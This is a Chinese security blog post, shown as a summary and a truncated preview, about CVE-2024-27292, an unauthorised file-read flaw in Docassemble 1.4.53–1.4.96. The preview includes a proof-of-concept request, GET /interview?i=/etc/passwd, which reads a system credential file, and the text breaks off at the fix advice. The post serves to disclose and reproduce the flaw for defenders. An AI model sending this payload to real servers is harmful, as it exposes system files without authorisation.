漏洞速递 | CVE-2024-27292漏洞（附EXP）

主要观点总结

本文介绍了Docassemble系统存在的安全漏洞及其修复方法。涉及Docassemble 1.4.53至1.4.96版本的安全漏洞，攻击者可利用该漏洞通过操作URL获取未授权的系统信息访问。此外，文章还提供了关于其他网络安全相关主题的信息，如各类安全证书的优惠、网络安全漏洞复现及修复建议。

关键观点总结

关键观点1: Docassemble系统存在的安全漏洞

Docassemble 1.4.53至1.4.96版本存在安全漏洞，攻击者可利用该漏洞获取未授权的系统信息访问。漏洞源于URL操作。

关键观点2: 影响版本

受影响版本为Docassemble 1.4.96和Docassemble 1.4.53。

关键观点3: 漏洞复现过程

通过访问漏洞环境，对漏洞进行复现。使用POC（Proof of Concept）进行漏洞复现，包括GET请求等操作。

关键观点4: 修复建议

厂商已发布升级补丁以修复该漏洞，用户可通过链接下载并安装补丁。

关键观点5: 其他网络安全相关信息

文章还提供了关于网络安全的其他信息，如各类安全证书的优惠、网络安全漏洞复现的详细指导等。

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统，用于指导访谈和文档组装。 Docassemble 1.4.53至1.4.96版本存在安全漏洞，该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问。 0x02影响版本 Docassemble Docassemble 1.4.96 Docassemble Docassemble 1.4.53 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /interview?i=/etc/passwd HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400) 文件读取成功。 3. Yakit工具加载nuclei文件测试（漏洞存在） 0x04修复建议 目 ………………………………